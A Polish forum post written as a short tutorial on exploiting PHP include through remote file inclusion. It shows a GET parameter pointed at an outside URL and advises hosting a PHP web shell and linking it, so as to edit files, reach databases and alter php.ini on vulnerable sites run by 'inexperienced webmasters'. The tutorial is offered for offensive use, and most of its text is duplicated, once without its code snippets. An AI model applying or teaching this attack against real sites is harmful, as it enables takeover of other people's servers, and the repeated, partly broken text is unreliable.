djmentos
Użytkownik
- Dołączył
- Maj 1, 2007
- Posty
- 1868
Jako, że jest to mój 666-ty post, a liczba 666 oznacza dobro to postanowiłem napisać jakiegoś tutoriala ^^
Będzie to krótkie opowiadanie o funkcji include i jej mrocznego wykorzystania
I - Co nam będzie potrzebne:
- Podstawowa wiedza w temacie PHP
- Kilka narzędzi (opisy poniżej)
- Kilka minut na przeczytanie tego materiału
II - Wstęp
PHP - jest to język oprogramowywania skryptów stron WWW wykonywany po stronie serwera. W przeciwieństwie do JavaScript czy HTML, których kody są wysyłane do przeglądarki i dopiero przetwarzane.
Gdyby uzyskać dostęp do wszystkich funkcji PHP można zrobić dosłownie wszystko na maszynie. Ogranicza tutaj nas tylko wyobraźnia. Tylko w jaki sposób to uczynić? Tutaj pomogą nam twórcy PHP i niedoświadczeni webmasterzy.
III - Jak będziemy działać.
Twórcy PHP udostępnili nam sporo funkcji. My zajmiemy się jedną z nich: include. Pozwala ona na dopisanie zewnętrznego pliku w podanym miejscu. Przykład:
index.php:
ha.php:
localhost/index.php:
Jak wykorzystują to niedoświadczeni webmasterzy? Tworzą oni witryny oparte na menu z funkcją include.
Przykład:
IV - Jak to wykorzystać?
W bardzo prosty sposób. Zamiast strony na serwerze możemy podać jakąś inną.
Np: index.php?strona=http://www.project.jmp.com.pl/index.php
Wtedy zamiast strony about pojawi się strona główna mojej strony
V - Tylko po co?
A no po to, że w internecie możemy znaleźć oprogramowanie PHP zwane shell code.
Taki plik umieszczamy na naszym serwerze, a następnie podajemy do niego link.
Taki shell code pozwala na edycję plików przez stronę na serwerze. Niektóre skrypty mają jeszcze dodatkowe opcje jak dostęp do bazy danych czy możliwość zmiany parametrów pliku php.ini.
Będzie to krótkie opowiadanie o funkcji include i jej mrocznego wykorzystania
I - Co nam będzie potrzebne:
- Podstawowa wiedza w temacie PHP
- Kilka narzędzi (opisy poniżej)
- Kilka minut na przeczytanie tego materiału
II - Wstęp
PHP - jest to język oprogramowywania skryptów stron WWW wykonywany po stronie serwera. W przeciwieństwie do JavaScript czy HTML, których kody są wysyłane do przeglądarki i dopiero przetwarzane.
Gdyby uzyskać dostęp do wszystkich funkcji PHP można zrobić dosłownie wszystko na maszynie. Ogranicza tutaj nas tylko wyobraźnia. Tylko w jaki sposób to uczynić? Tutaj pomogą nam twórcy PHP i niedoświadczeni webmasterzy.
III - Jak będziemy działać.
Twórcy PHP udostępnili nam sporo funkcji. My zajmiemy się jedną z nich: include. Pozwala ona na dopisanie zewnętrznego pliku w podanym miejscu. Przykład:
index.php:
Kod:
print 'Oto include:';
include('ha.php');
Kod:
print 'Hello World';Jak wykorzystują to niedoświadczeni webmasterzy? Tworzą oni witryny oparte na menu z funkcją include.
Przykład:
Zmienną GET przesyłają nazwę pliku, jaki ma zostać dołączony do strony.
IV - Jak to wykorzystać?
W bardzo prosty sposób. Zamiast strony na serwerze możemy podać jakąś inną.
Np: index.php?strona=http://www.project.jmp.com.pl/index.php
Wtedy zamiast strony about pojawi się strona główna mojej strony
V - Tylko po co?
A no po to, że w internecie możemy znaleźć oprogramowanie PHP zwane shell code.
Taki plik umieszczamy na naszym serwerze, a następnie podajemy do niego link.
Taki shell code pozwala na edycję plików przez stronę na serwerze. Niektóre skrypty mają jeszcze dodatkowe opcje jak dostęp do bazy danych czy możliwość zmiany parametrów pliku php.ini.